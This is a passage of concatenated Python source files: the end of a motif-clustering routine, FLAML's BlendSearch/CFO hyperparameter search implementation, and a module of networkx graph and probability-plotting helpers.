distmat_nn=distmat_nn, nn=seqlet_neighbors,
average_with_transpose=True)
del distmat_nn
del seqlet_neighbors
if (self.verbose):
print("Computing betas for density adaptation")
#Compute beta values for the density adaptation. *store it*
betas_and_ps = Parallel(n_jobs=self.n_cores)(
delayed(util.binary_search_perplexity)(
self.tsne_perplexity, distances)
for distances in sym_distmat_nn)
betas = np.array([x[0] for x in betas_and_ps])
if (self.verbose):
print("Computing normalizing denominators")
#also compute the normalization factor needed to get probs to sum to 1
#note: sticking to lists here because different rows of
# sym_distmat_nn may have different lengths after adding in
# the symmetric pairs
densadapted_affmat_nn_unnorm = [np.exp(-np.array(distmat_row)/beta)
for distmat_row, beta in zip(sym_distmat_nn, betas)]
normfactors = np.array([max(np.sum(x),1e-8) for x in
densadapted_affmat_nn_unnorm])
sym_densadapted_affmat_nn = self.do_density_adaptation(
new_rows_distmat_nn=sym_distmat_nn,
new_rows_nn=sym_seqlet_neighbors,
new_rows_betas=betas,
new_rows_normfactors=normfactors)
util.verify_symmetric_nn_affmat(
affmat_nn=sym_densadapted_affmat_nn,
nn=sym_seqlet_neighbors)
#Make csr matrix
csr_density_adapted_affmat =\
util.coo_matrix_from_neighborsformat(
entries=sym_densadapted_affmat_nn,
neighbors=sym_seqlet_neighbors,
ncols=len(sym_densadapted_affmat_nn)).tocsr()
if (self.verbose):
print("(Round "+str(round_num)+") Computing clustering")
print_memory_use()
sys.stdout.flush()
#cluster_results = clusterer(density_adapted_affmat,
# initclusters=filtered_initclusters)
#del density_adapted_affmat
#cluster_results_sets.append(cluster_results)
cluster_results = clusterer(csr_density_adapted_affmat,
initclusters=filtered_initclusters)
del csr_density_adapted_affmat
num_clusters = max(cluster_results.cluster_indices+1)
cluster_idx_counts = Counter(cluster_results.cluster_indices)
if (self.verbose):
print("Got "+str(num_clusters)
+" clusters after round "+str(round_num))
print("Counts:")
print(dict([x for x in cluster_idx_counts.items()]))
print_memory_use()
sys.stdout.flush()
if (self.verbose):
print("(Round "+str(round_num)+") Aggregating seqlets"
+" in each cluster")
print_memory_use()
sys.stdout.flush()
cluster_to_motif, cluster_to_eliminated_motif =\
self.get_cluster_to_aggregate_motif(
seqlets=filtered_seqlets,
cluster_indices=cluster_results.cluster_indices,
sign_consistency_check=True,
min_seqlets_in_motif=0)
#obtain unique seqlets from adjusted motifs
seqlets = list(dict([(y.exidx_start_end_string, y)
for x in cluster_to_motif.values()
for y in x.seqlets]).values())
if (self.verbose):
print("Got "+str(len(cluster_to_motif.values()))+" clusters")
print("Splitting into subclusters...")
print_memory_use()
sys.stdout.flush()
split_patterns = self.spurious_merge_detector(
cluster_to_motif.values())
if (len(split_patterns)==0):
if (self.verbose):
print("No more surviving patterns - bailing!")
return SeqletsToPatternsResults(
each_round_initcluster_motifs=None,
patterns=None,
remaining_patterns=None,
pattern_merge_hierarchy=None,
cluster_results=None,
total_time_taken=None,
success=False,
seqlets=None,
affmat=None)
#Now start merging patterns
if (self.verbose):
print("Merging on "+str(len(split_patterns))+" clusters")
print_memory_use()
sys.stdout.flush()
merged_patterns, pattern_merge_hierarchy =\
self.similar_patterns_collapser(
patterns=split_patterns)
merged_patterns = sorted(merged_patterns, key=lambda x: -x.num_seqlets)
if (self.verbose):
print("Got "+str(len(merged_patterns))+" patterns after merging")
print_memory_use()
sys.stdout.flush()
if (self.verbose):
print("Performing filtering")
print_memory_use()
sys.stdout.flush()
final_patterns, remaining_patterns = self.pattern_filterer(
merged_patterns)
#reassigned_patterns = self.seqlet_reassigner(merged_patterns)
final_patterns = self.final_postprocessor(final_patterns)
remaining_patterns =\
self.final_postprocessor(remaining_patterns)
if (self.verbose):
print("Got "+str(len(final_patterns))
+" patterns after filtering")
print_memory_use()
sys.stdout.flush()
total_time_taken = round(time.time()-start,2)
if (self.verbose):
print("Total time taken is "
+str(total_time_taken)+"s")
print_memory_use()
sys.stdout.flush()
#apply subclustering procedure on the final patterns
print("Applying subclustering to the final motifs")
for patternidx, pattern in enumerate(final_patterns):
print("On pattern",patternidx)
pattern.compute_subclusters_and_embedding(
verbose=self.verbose,
**self.subcluster_settings)
results = SeqletsToPatternsResults(
each_round_initcluster_motifs=each_round_initcluster_motifs,
patterns=final_patterns,
remaining_patterns=remaining_patterns,
seqlets=filtered_seqlets, #last stage of filtered seqlets
#affmat=filtered_affmat,
cluster_results=cluster_results,
total_time_taken=total_time_taken,
#seqlets_sets=seqlets_sets,
#coarse_affmats=coarse_affmats,
#nn_affmats=nn_affmats,
#filtered_seqlets_sets=filtered_seqlets_sets,
#filtered_affmats=filtered_affmats,
#density_adapted_affmats=density_adapted_affmats,
#cluster_results_sets=cluster_results_sets,
#cluster_to_motif_sets=cluster_to_motif_sets,
#cluster_to_eliminated_motif_sets=cluster_to_eliminated_motif_sets,
merged_patterns=merged_patterns,
pattern_merge_hierarchy=pattern_merge_hierarchy,
#reassigned_patterns=reassigned_patterns
)
return results
|
the-stack_106_22104
|
'''!
* Copyright (c) 2020-2021 Microsoft Corporation. All rights reserved.
* Licensed under the MIT License. See LICENSE file in the
* project root for license information.
'''
from typing import Dict, Optional, List, Tuple, Callable
import numpy as np
import time
import pickle
try:
from ray.tune.suggest import Searcher
from ray.tune.suggest.optuna import OptunaSearch as GlobalSearch
from ray.tune.suggest.variant_generator import generate_variants
except ImportError:
from .suggestion import Searcher
from .suggestion import OptunaSearch as GlobalSearch
from .variant_generator import generate_variants
from .search_thread import SearchThread
from .flow2 import FLOW2 as LocalSearch
import logging
logger = logging.getLogger(__name__)
class BlendSearch(Searcher):
'''class for BlendSearch algorithm
'''
cost_attr = "time_total_s" # cost attribute in result
lagrange = '_lagrange' # suffix for lagrange-modified metric
penalty = 1e+10 # penalty term for constraints
def __init__(self,
metric: Optional[str] = None,
mode: Optional[str] = None,
space: Optional[dict] = None,
points_to_evaluate: Optional[List[dict]] = None,
low_cost_partial_config: Optional[dict] = None,
cat_hp_cost: Optional[dict] = None,
prune_attr: Optional[str] = None,
min_resource: Optional[float] = None,
max_resource: Optional[float] = None,
reduction_factor: Optional[float] = None,
global_search_alg: Optional[Searcher] = None,
config_constraints: Optional[
List[Tuple[Callable[[dict], float], str, float]]] = None,
metric_constraints: Optional[
List[Tuple[str, str, float]]] = None,
seed: Optional[int] = 20):
'''Constructor
Args:
metric: A string of the metric name to optimize for.
mode: A string in ['min', 'max'] to specify the objective as
minimization or maximization.
space: A dictionary to specify the search space.
points_to_evaluate: Initial parameter suggestions to be run first.
low_cost_partial_config: A dictionary from a subset of
controlled dimensions to the initial low-cost values.
e.g.,
.. code-block:: python
{'n_estimators': 4, 'max_leaves': 4}
cat_hp_cost: A dictionary from a subset of categorical dimensions
to the relative cost of each choice.
e.g.,
.. code-block:: python
{'tree_method': [1, 1, 2]}
i.e., the relative cost of the
three choices of 'tree_method' is 1, 1 and 2 respectively.
prune_attr: A string of the attribute used for pruning.
Not necessarily in space.
When prune_attr is in space, it is a hyperparameter, e.g.,
'n_iters', and the best value is unknown.
When prune_attr is not in space, it is a resource dimension,
e.g., 'sample_size', and the peak performance is assumed
to be at the max_resource.
min_resource: A float of the minimal resource to use for the
prune_attr; only valid if prune_attr is not in space.
max_resource: A float of the maximal resource to use for the
prune_attr; only valid if prune_attr is not in space.
reduction_factor: A float of the reduction factor used for
incremental pruning.
global_search_alg: A Searcher instance as the global search
instance. If omitted, Optuna is used. The following algos have
known issues when used as global_search_alg:
- HyperOptSearch raises exception sometimes
- TuneBOHB has its own scheduler
config_constraints: A list of config constraints to be satisfied.
e.g.,
.. code-block: python
config_constraints = [(mem_size, '<=', 1024**3)]
mem_size is a function which produces a float number for the bytes
needed for a config.
It is used to skip configs which do not fit in memory.
metric_constraints: A list of metric constraints to be satisfied.
e.g., `['precision', '>=', 0.9]`
seed: An integer of the random seed.
'''
self._metric, self._mode = metric, mode
init_config = low_cost_partial_config or {}
if not init_config:
logger.warning(
"No low-cost partial config given to the search algorithm. "
"For cost-frugal search, "
"consider providing low-cost values for cost-related hps via "
"'low_cost_partial_config'."
)
self._points_to_evaluate = points_to_evaluate or []
self._config_constraints = config_constraints
self._metric_constraints = metric_constraints
if self._metric_constraints:
# metric modified by lagrange
metric += self.lagrange
if global_search_alg is not None:
self._gs = global_search_alg
elif getattr(self, '__name__', None) != 'CFO':
try:
gs_seed = seed - 10 if (seed - 10) >= 0 else seed - 11 + (1 << 32)
self._gs = GlobalSearch(space=space, metric=metric, mode=mode, seed=gs_seed)
except TypeError:
self._gs = GlobalSearch(space=space, metric=metric, mode=mode)
else:
self._gs = None
self._ls = LocalSearch(
init_config, metric, mode, cat_hp_cost, space,
prune_attr, min_resource, max_resource, reduction_factor, seed)
self._init_search()
def set_search_properties(self,
metric: Optional[str] = None,
mode: Optional[str] = None,
config: Optional[Dict] = None) -> bool:
if not self._ls.space:
if metric:
self._metric = metric
if self._metric_constraints:
# metric modified by lagrange
metric += self.lagrange
# TODO: don't change metric for global search methods that
# can handle constraints already
if mode:
self._mode = mode
self._ls.set_search_properties(metric, mode, config)
if self._gs is not None:
self._gs.set_search_properties(metric, mode, config)
self._init_search()
if 'time_budget_s' in config:
time_budget_s = config['time_budget_s']
if time_budget_s is not None:
self._deadline = time_budget_s + time.time()
SearchThread.set_eps(time_budget_s)
if 'metric_target' in config:
self._metric_target = config.get('metric_target')
return True
def _init_search(self):
'''initialize the search
'''
self._metric_target = np.inf * self._ls.metric_op
self._search_thread_pool = {
# id: int -> thread: SearchThread
0: SearchThread(self._ls.mode, self._gs)
}
self._thread_count = 1 # total # threads created
self._init_used = self._ls.init_config is None
self._trial_proposed_by = {} # trial_id: str -> thread_id: int
self._ls_bound_min = self._ls.normalize(self._ls.init_config)
self._ls_bound_max = self._ls_bound_min.copy()
self._gs_admissible_min = self._ls_bound_min.copy()
self._gs_admissible_max = self._ls_bound_max.copy()
self._result = {} # config_signature: tuple -> result: Dict
self._deadline = np.inf
if self._metric_constraints:
self._metric_constraint_satisfied = False
self._metric_constraint_penalty = [
self.penalty for _ in self._metric_constraints]
else:
self._metric_constraint_satisfied = True
self._metric_constraint_penalty = None
def save(self, checkpoint_path: str):
''' save states to a checkpoint path
'''
save_object = self
with open(checkpoint_path, "wb") as outputFile:
pickle.dump(save_object, outputFile)
def restore(self, checkpoint_path: str):
''' restore states from checkpoint
'''
with open(checkpoint_path, "rb") as inputFile:
state = pickle.load(inputFile)
self._metric_target = state._metric_target
self._search_thread_pool = state._search_thread_pool
self._thread_count = state._thread_count
self._init_used = state._init_used
self._trial_proposed_by = state._trial_proposed_by
self._ls_bound_min = state._ls_bound_min
self._ls_bound_max = state._ls_bound_max
self._gs_admissible_min = state._gs_admissible_min
self._gs_admissible_max = state._gs_admissible_max
self._result = state._result
self._deadline = state._deadline
self._metric, self._mode = state._metric, state._mode
self._points_to_evaluate = state._points_to_evaluate
self._gs = state._gs
self._ls = state._ls
self._config_constraints = state._config_constraints
self._metric_constraints = state._metric_constraints
self._metric_constraint_satisfied = state._metric_constraint_satisfied
self._metric_constraint_penalty = state._metric_constraint_penalty
@property
def metric_target(self):
return self._metric_target
def on_trial_complete(self, trial_id: str, result: Optional[Dict] = None,
error: bool = False):
''' search thread updater and cleaner
'''
metric_constraint_satisfied = True
if result and not error and self._metric_constraints:
# account for metric constraints if any
objective = result[self._metric]
for i, constraint in enumerate(self._metric_constraints):
metric_constraint, sign, threshold = constraint
value = result.get(metric_constraint)
if value:
# sign is <= or >=
sign_op = 1 if sign == '<=' else -1
violation = (value - threshold) * sign_op
if violation > 0:
# add penalty term to the metric
objective += self._metric_constraint_penalty[
i] * violation * self._ls.metric_op
metric_constraint_satisfied = False
if self._metric_constraint_penalty[i] < self.penalty:
self._metric_constraint_penalty[i] += violation
result[self._metric + self.lagrange] = objective
if metric_constraint_satisfied and not self._metric_constraint_satisfied:
# found a feasible point
self._metric_constraint_penalty = [1 for _ in self._metric_constraints]
self._metric_constraint_satisfied |= metric_constraint_satisfied
thread_id = self._trial_proposed_by.get(trial_id)
if thread_id in self._search_thread_pool:
self._search_thread_pool[thread_id].on_trial_complete(
trial_id, result, error)
del self._trial_proposed_by[trial_id]
if result:
config = {}
for key, value in result.items():
if key.startswith('config/'):
config[key[7:]] = value
if error: # remove from result cache
del self._result[self._ls.config_signature(config)]
else: # add to result cache
self._result[self._ls.config_signature(config)] = result
# update target metric if improved
objective = result[
self._metric + self.lagrange] if self._metric_constraints \
else result[self._metric]
if (objective - self._metric_target) * self._ls.metric_op < 0:
self._metric_target = objective
if not thread_id and metric_constraint_satisfied \
and self._create_condition(result):
# thread creator
self._search_thread_pool[self._thread_count] = SearchThread(
self._ls.mode,
self._ls.create(
config, objective, cost=result[self.cost_attr])
)
thread_id = self._thread_count
self._thread_count += 1
self._update_admissible_region(
config, self._ls_bound_min, self._ls_bound_max)
elif thread_id and not self._metric_constraint_satisfied:
# no point has been found to satisfy metric constraint
self._expand_admissible_region()
# reset admissible region to ls bounding box
self._gs_admissible_min.update(self._ls_bound_min)
self._gs_admissible_max.update(self._ls_bound_max)
# cleaner
if thread_id and thread_id in self._search_thread_pool:
# local search thread
self._clean(thread_id)
def _update_admissible_region(self, config, admissible_min, admissible_max):
# update admissible region
normalized_config = self._ls.normalize(config)
for key in admissible_min:
value = normalized_config[key]
if value > admissible_max[key]:
admissible_max[key] = value
elif value < admissible_min[key]:
admissible_min[key] = value
def _create_condition(self, result: Dict) -> bool:
''' create thread condition
'''
if len(self._search_thread_pool) < 2:
return True
obj_median = np.median(
[thread.obj_best1 for id, thread in self._search_thread_pool.items()
if id])
return result[self._metric] * self._ls.metric_op < obj_median
def _clean(self, thread_id: int):
''' delete thread and increase admissible region if converged,
merge local threads if they are close
'''
assert thread_id
todelete = set()
for id in self._search_thread_pool:
if id and id != thread_id:
if self._inferior(id, thread_id):
todelete.add(id)
for id in self._search_thread_pool:
if id and id != thread_id:
if self._inferior(thread_id, id):
todelete.add(thread_id)
break
if self._search_thread_pool[thread_id].converged:
todelete.add(thread_id)
self._expand_admissible_region()
for id in todelete:
del self._search_thread_pool[id]
def _expand_admissible_region(self):
for key in self._ls_bound_max:
self._ls_bound_max[key] += self._ls.STEPSIZE
self._ls_bound_min[key] -= self._ls.STEPSIZE
def _inferior(self, id1: int, id2: int) -> bool:
''' whether thread id1 is inferior to id2
'''
t1 = self._search_thread_pool[id1]
t2 = self._search_thread_pool[id2]
if t1.obj_best1 < t2.obj_best2:
return False
elif t1.resource and t1.resource < t2.resource:
return False
elif t2.reach(t1):
return True
return False
def on_trial_result(self, trial_id: str, result: Dict):
''' receive intermediate result
'''
if trial_id not in self._trial_proposed_by:
return
thread_id = self._trial_proposed_by[trial_id]
if thread_id not in self._search_thread_pool:
return
if result and self._metric_constraints:
result[self._metric + self.lagrange] = result[self._metric]
self._search_thread_pool[thread_id].on_trial_result(trial_id, result)
def suggest(self, trial_id: str) -> Optional[Dict]:
''' choose thread, suggest a valid config
'''
if self._init_used and not self._points_to_evaluate:
choice, backup = self._select_thread()
if choice < 0: # timeout
return None
config = self._search_thread_pool[choice].suggest(trial_id)
if choice and config is None:
# local search thread finishes
if self._search_thread_pool[choice].converged:
self._expand_admissible_region()
del self._search_thread_pool[choice]
return None
# preliminary check; not checking config validation
skip = self._should_skip(choice, trial_id, config)
if skip:
if choice:
return None
# use rs when BO fails to suggest a config
for _, generated in generate_variants({'config': self._ls.space}):
config = generated['config']
break # get one random config
skip = self._should_skip(-1, trial_id, config)
if skip:
return None
if choice or self._valid(config):
# LS or valid or no backup choice
self._trial_proposed_by[trial_id] = choice
else: # invalid config proposed by GS
if choice == backup:
# use CFO's init point
init_config = self._ls.init_config
config = self._ls.complete_config(
init_config, self._ls_bound_min, self._ls_bound_max)
self._trial_proposed_by[trial_id] = choice
else:
config = self._search_thread_pool[backup].suggest(trial_id)
skip = self._should_skip(backup, trial_id, config)
if skip:
return None
self._trial_proposed_by[trial_id] = backup
choice = backup
if not choice: # global search
if self._ls._resource:
# TODO: min or median?
config[self._ls.prune_attr] = self._ls.min_resource
# temporarily relax admissible region for parallel proposals
self._update_admissible_region(
config, self._gs_admissible_min, self._gs_admissible_max)
else:
self._update_admissible_region(
config, self._ls_bound_min, self._ls_bound_max)
self._gs_admissible_min.update(self._ls_bound_min)
self._gs_admissible_max.update(self._ls_bound_max)
self._result[self._ls.config_signature(config)] = {}
else: # use init config
init_config = self._points_to_evaluate.pop(
0) if self._points_to_evaluate else self._ls.init_config
config = self._ls.complete_config(
init_config, self._ls_bound_min, self._ls_bound_max)
config_signature = self._ls.config_signature(config)
result = self._result.get(config_signature)
if result: # tried before
return None
elif result is None: # not tried before
self._result[config_signature] = {}
else: # running but no result yet
return None
self._init_used = True
self._trial_proposed_by[trial_id] = 0
self._search_thread_pool[0].running += 1
return config
def _should_skip(self, choice, trial_id, config) -> bool:
''' if config is None or config's result is known or constraints are violated
return True; o.w. return False
'''
if config is None:
return True
config_signature = self._ls.config_signature(config)
exists = config_signature in self._result
# check constraints
if not exists and self._config_constraints:
for constraint in self._config_constraints:
func, sign, threshold = constraint
value = func(config)
if (sign == '<=' and value > threshold
or sign == '>=' and value < threshold):
self._result[config_signature] = {
self._metric: np.inf * self._ls.metric_op,
'time_total_s': 1,
}
exists = True
break
if exists: # suggested before
if choice >= 0: # not fallback to rs
result = self._result.get(config_signature)
if result: # finished
self._search_thread_pool[choice].on_trial_complete(
trial_id, result, error=False)
if choice:
# local search thread
self._clean(choice)
# else: # running
# # tell the thread there is an error
# self._search_thread_pool[choice].on_trial_complete(
# trial_id, {}, error=True)
return True
return False
def _select_thread(self) -> Tuple:
''' thread selector; use can_suggest to check LS availability
'''
# update priority
min_eci = self._deadline - time.time()
if min_eci <= 0:
return -1, -1
max_speed = 0
for thread in self._search_thread_pool.values():
if thread.speed > max_speed:
max_speed = thread.speed
for thread in self._search_thread_pool.values():
thread.update_eci(self._metric_target, max_speed)
if thread.eci < min_eci:
min_eci = thread.eci
for thread in self._search_thread_pool.values():
thread.update_priority(min_eci)
top_thread_id = backup_thread_id = 0
priority1 = priority2 = self._search_thread_pool[0].priority
for thread_id, thread in self._search_thread_pool.items():
# if thread_id:
# print(
# f"priority of thread {thread_id}={thread.priority}")
# logger.debug(
# f"thread {thread_id}.can_suggest={thread.can_suggest}")
if thread_id and thread.can_suggest:
priority = thread.priority
if priority > priority1:
priority1 = priority
top_thread_id = thread_id
if priority > priority2 or backup_thread_id == 0:
priority2 = priority
backup_thread_id = thread_id
return top_thread_id, backup_thread_id
def _valid(self, config: Dict) -> bool:
''' config validator
'''
normalized_config = self._ls.normalize(config)
for key in self._gs_admissible_min:
if key in config:
value = normalized_config[key]
if value + self._ls.STEPSIZE < self._gs_admissible_min[key] \
or value > self._gs_admissible_max[key] + self._ls.STEPSIZE:
return False
return True
try:
from ray.tune import (uniform, quniform, choice, randint, qrandint, randn,
qrandn, loguniform, qloguniform)
except ImportError:
from ..tune.sample import (uniform, quniform, choice, randint, qrandint, randn,
qrandn, loguniform, qloguniform)
try:
from nni.tuner import Tuner as NNITuner
from nni.utils import extract_scalar_reward
class BlendSearchTuner(BlendSearch, NNITuner):
'''Tuner class for NNI
'''
def receive_trial_result(self, parameter_id, parameters, value,
**kwargs):
'''
Receive trial's final result.
parameter_id: int
parameters: object created by 'generate_parameters()'
value: final metrics of the trial, including default metric
'''
result = {}
for key, value in parameters.items():
result['config/' + key] = value
reward = extract_scalar_reward(value)
result[self._metric] = reward
# if nni does not report training cost,
# using sequence as an approximation.
# if no sequence, using a constant 1
result[self.cost_attr] = value.get(self.cost_attr, value.get(
'sequence', 1))
self.on_trial_complete(str(parameter_id), result)
...
def generate_parameters(self, parameter_id, **kwargs) -> Dict:
'''
Returns a set of trial (hyper-)parameters, as a serializable object
parameter_id: int
'''
return self.suggest(str(parameter_id))
...
def update_search_space(self, search_space):
'''
Tuners are advised to support updating search space at run-time.
If a tuner can only set search space once before generating first hyper-parameters,
it should explicitly document this behaviour.
search_space: JSON object created by experiment owner
'''
config = {}
for key, value in search_space.items():
v = value.get("_value")
_type = value['_type']
if _type == 'choice':
config[key] = choice(v)
elif _type == 'randint':
config[key] = randint(v[0], v[1] - 1)
elif _type == 'uniform':
config[key] = uniform(v[0], v[1])
elif _type == 'quniform':
config[key] = quniform(v[0], v[1], v[2])
elif _type == 'loguniform':
config[key] = loguniform(v[0], v[1])
elif _type == 'qloguniform':
config[key] = qloguniform(v[0], v[1], v[2])
elif _type == 'normal':
config[key] = randn(v[1], v[2])
elif _type == 'qnormal':
config[key] = qrandn(v[1], v[2], v[3])
else:
raise ValueError(
f'unsupported type in search_space {_type}')
self._ls.set_search_properties(None, None, config)
if self._gs is not None:
self._gs.set_search_properties(None, None, config)
self._init_search()
except ImportError:
class BlendSearchTuner(BlendSearch):
pass
class CFO(BlendSearchTuner):
''' class for CFO algorithm
'''
__name__ = 'CFO'
def suggest(self, trial_id: str) -> Optional[Dict]:
# Number of threads is 1 or 2. Thread 0 is a vacuous thread
assert len(self._search_thread_pool) < 3, len(self._search_thread_pool)
if len(self._search_thread_pool) < 2:
# When a local converges, the number of threads is 1
# Need to restart
self._init_used = False
return super().suggest(trial_id)
def _select_thread(self) -> Tuple:
for key in self._search_thread_pool:
if key:
return key, key
def _create_condition(self, result: Dict) -> bool:
''' create thread condition
'''
return len(self._search_thread_pool) < 2
def create_next(client):
''' functional API for HPO
'''
state = client.get_state()
setting = client.get_settings_dict()
if state is None:
# first time call
try:
from ray.tune.trial import Trial
except ImportError:
from ..tune.trial import Trial
method = setting.get('method', 'BlendSearch')
mode = client.get_optimization_mode()
if mode == 'minimize':
mode = 'min'
elif mode == 'maximize':
mode = 'max'
metric = client.get_primary_metric()
hp_space = client.get_hyperparameter_space_dict()
space = {}
for key, value in hp_space.items():
t = value["type"]
if t == 'continuous':
space[key] = uniform(value["min_val"], value["max_val"])
elif t == 'discrete':
space[key] = choice(value["values"])
elif t == 'integral':
space[key] = randint(value["min_val"], value["max_val"])
elif t == 'quantized_continuous':
space[key] = quniform(value["min_val"], value["max_val"],
value["step"])
init_config = setting.get('init_config', None)
if init_config:
points_to_evaluate = [init_config]
else:
points_to_evaluate = None
cat_hp_cost = setting.get('cat_hp_cost', None)
if method == 'BlendSearch':
Algo = BlendSearch
elif method == 'CFO':
Algo = CFO
algo = Algo(
mode=mode,
metric=metric,
space=space,
points_to_evaluate=points_to_evaluate,
cat_hp_cost=cat_hp_cost,
)
time_budget_s = setting.get('time_budget_s', None)
if time_budget_s:
algo._deadline = time_budget_s + time.time()
config2trialid = {}
else:
algo = state['algo']
config2trialid = state['config2trialid']
# update finished trials
trials_completed = []
for trial in client.get_trials():
if trial.end_time is not None:
signature = algo._ls.config_signature(trial.hp_sample)
if not algo._result[signature]:
trials_completed.append((trial.end_time, trial))
trials_completed.sort()
for t in trials_completed:
end_time, trial = t
trial_id = config2trialid[trial.hp_sample]
result = {}
result[algo.metric] = trial.metrics[algo.metric].values[-1]
result[algo.cost_attr] = (end_time - trial.start_time).total_seconds()
for key, value in trial.hp_sample.items():
result['config/' + key] = value
algo.on_trial_complete(trial_id, result=result)
# propose new trial
trial_id = Trial.generate_id()
config = algo.suggest(trial_id)
if config:
config2trialid[config] = trial_id
client.launch_trial(config)
client.update_state({'algo': algo, 'config2trialid': config2trialid})
|
the-stack_106_22106
|
import networkx as nx
import numpy as np
import scipy as sp
import matplotlib.pyplot as plt
from itertools import product
import random
import math
from functools import wraps
import pandas as pd
from .information import mutual_information
def compose(f, g):
"""
:param f: Second function to apply
:param g: First function to apply
:return: A composition of functions
"""
return lambda *args, **kwargs: f(g(*args, **kwargs))
lmap = compose(list, map)
def sigmoid(x):
"""
Logistic sigmoid function
:param x: argument
:return: function value
"""
return 1 / (1 + math.exp(-x))
def extract_node_attribute(graph, name, default=None):
"""
Extract attributes of a networx graph nodes to a dict.
:param graph: target graph
:param name: name of the attribute
:param default: default value (used if node doesn't have the specified attribute)
:return: a dict of attributes in form of { node_name : attribute }
"""
return { i : d.get(name, default) for i, d in graph.nodes(data=True) }
def extract_edge_attribute(graph, name, default=None):
"""
Extract attributes of a networx graph edges to a dict.
:param graph: target graph
:param name: name of the attribute
:param default: default value (used if edge doesn't have the specified attribute)
:return: a dict of attributes in form of { (from, to) : attribute }
"""
return { (i, j) : d.get(name, default) for i, j, d in graph.edges(data=True) }
def pretty_draw(graph, node_color=lambda node, attr: '#DDDDDD',
edge_color=lambda node1, node2, attr: '#000000', node_size=lambda node, attr: 300, highres=False):
"""
Draws a graph. You can specify colors of nodes, colors of edges and size of nodes via lambda
functions.
:param graph: target graph
:param node_color: lambda function mapping node name and its attributes to the desired color
:param edge_color: lambda function mapping edge and its attributes to the desired color
:param node_size: lambda function mapping node name and its attributes to the desired size
:return: None
"""
if highres:
fig = plt.figure(figsize=(100, 100))
else:
fig = plt.figure(figsize=(17, 6))
plt.axis('off')
if type(node_color) is str:
node_colors = extract_node_attribute(graph, 'color', default='#DDDDDD')
node_colors = list(map(node_colors.__getitem__, graph.nodes()))
else:
node_colors = list(map(lambda args: node_color(*args), graph.nodes(data=True)))
if type(edge_color) is str:
edge_colors = extract_edge_attribute(graph, 'color', default='#000000')
edge_colors = list(map(edge_colors.__getitem__, graph.edges()))
else:
edge_colors = list(map(lambda args: edge_color(*args), graph.edges(data=True)))
if type(node_size) is str:
node_sizes = extract_node_attribute(graph, 'size', default='300')
node_sizes = list(map(node_sizes.__getitem__, graph.nodes()))
else:
node_sizes = list(map(lambda args: node_size(*args), graph.nodes(data=True)))
nx.draw_networkx(graph,
with_labels=True,
pos=nx.spring_layout(graph),
node_color=node_colors,
edge_color=edge_colors,
node_size=node_sizes
)
return None
def maximum_spanning_tree(graph, weight='weight'):
"""
Find a maximum spanning tree of a graph
:param graph: target graph
:param weight: edge attribute which will be used as edge weight
:return: maximum spanning tree graph (networkx.Graph)
"""
for i, j in graph.edges():
graph.edge[i][j][weight] = -graph.edge[i][j][weight]
result = nx.minimum_spanning_tree(graph, weight='weight')
for i, j in graph.edges():
graph.edge[i][j][weight] = -graph.edge[i][j][weight]
return result
def plot_distr_2d(distr, domain=(-25, 25), use_domain=False):
"""
Smart 1d probability distribution plotter. Finds out the interval where the most of probability
mass lies, and plots distribution on it (so you don't need to specify x-axis interval).
:param distr: distribution to plot in (vectorized) form of numpy.array<float> -> numpy.array<float>
:param domain: a superset of plotting interval (to narrow search)
:return: None
"""
if not use_domain:
def binary_search_quantiles(quantile, begin, end, prec):
while end - begin > prec:
sep = (begin + end) / 2.0
#print(sep, sp.integrate.quad(distr, -np.inf, sep)[0])
if sp.integrate.quad(distr, -np.inf, sep)[0] < quantile:
begin = sep
else:
end = sep
return (begin + end) / 2.0
alpha = 0.001
begin = binary_search_quantiles(alpha, domain[0], domain[1], 0.1)
end = binary_search_quantiles(1 - alpha, domain[0], domain[1], 0.1)
if abs(end - begin) < 1e-10:
begin, end = domain
else:
begin, end = domain
x = np.arange(begin, end, (end - begin) / 1000)
try:
plt.plot(x, lmap(distr, x))
except:
plt.plot(x, lmap(lambda x: distr(np.array(x)), x))
return None
def plot_distr_3d(distr):
"""
Plot 2d probability distribution.
:param distr: the probability distribution to plot in form of [float, float] -> float
:return: None
"""
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
X = np.arange(-10, 10, 0.25)
Y = np.arange(-10, 10, 0.25)
X, Y = np.meshgrid(X, Y)
Z = np.squeeze(np.array([[distr([X[i][j], Y[i][j]]) for j in range(X.shape[1])] for i in range(X.shape[0])]))
ax.plot_surface(X, Y, Z, color='#DDDDDD')
return None
def plot_distr(distr, dim=1, domain=(-25, 25), use_domain=False):
"""
Smart distribution plotting (whether 1d or 2d).
:param distr: the distribution to plot
:param dim: dimensionality (if known)
:param domain: domain for 1d version
:return: None
"""
if dim == 1:
try:
plot_distr_2d(distr, domain=domain, use_domain=use_domain)
except:
plot_distr_3d(distr)
else:
plot_distr_3d(distr)
return None
def flip_edge(graph, edge):
"""
Flips an edge in a networkx graph.
:param graph: a target graph
:param edge: edge to flip
:return: None
"""
if graph.has_edge(*edge):
graph.remove_edge(*edge)
else:
graph.add_edge(*edge)
return None
def spoil_graph(graph, p):
"""
'Spoils' a graph: flips every edge with probability p. Doesn't change the original graph.
:param graph: target graph
:param p: flip probability
:return: spoiled graph
"""
graph = graph.copy()
for i in range(len(graph.nodes())):
for j in range(i):
if random.random() < p:
flip_edge(graph, (i, j))
return graph
def reverse_edge(G, edge, copy=False):
"""
Reverse edge in graph.
:param G: target graph
:param edge: target edge
:param copy: if True, copy graph before changing it
:return: graph with reversed edge
"""
if copy:
G = G.copy()
x, y = edge
G.remove_edge(x, y)
G.add_edge(y, x)
return G
def are_equal_graphs(G1, G2):
"""
Check graph equality (equal node names, and equal edges between them).
:param G1: first graph
:param G2: second graph
:return: are they equal
"""
if set(G1.nodes()) != set(G2.nodes()):
return False
return all(map(lambda x: G1.has_edge(*x), G2.edges())) and all(map(lambda x: G2.has_edge(*x), G1.edges()))
def is_subgraph(G1, G2):
"""
Is G1 a subgraph of G2?
:param G1: supposed subgraph
:param G2: graph
:return: is G1 subgraph of G2
"""
return set(G1.edges()).issubset(set(G2.edges()))
def descendants(G, x):
"""
Set of all descendants of node in a graph, not including itself.
:param G: target graph
:param x: target node
:return: set of descendants
"""
return set(nx.dfs_preorder_nodes(G, x)) - {x}
def ancestors(G, x, G_reversed=None):
"""
Set of all ancestors of node in a graph, not including itself.
:param G: target graph
:param x: target node
:param G_reversed: you can supply graph with reversed edges for speedup
:return: set of ancestors
"""
if G_reversed is None:
G_reversed = G.reverse()
return descendants(G_reversed, x)
def reprsort(li):
"""
sometimes, we need a way to get an unique ordering of any Python objects
so here it is!
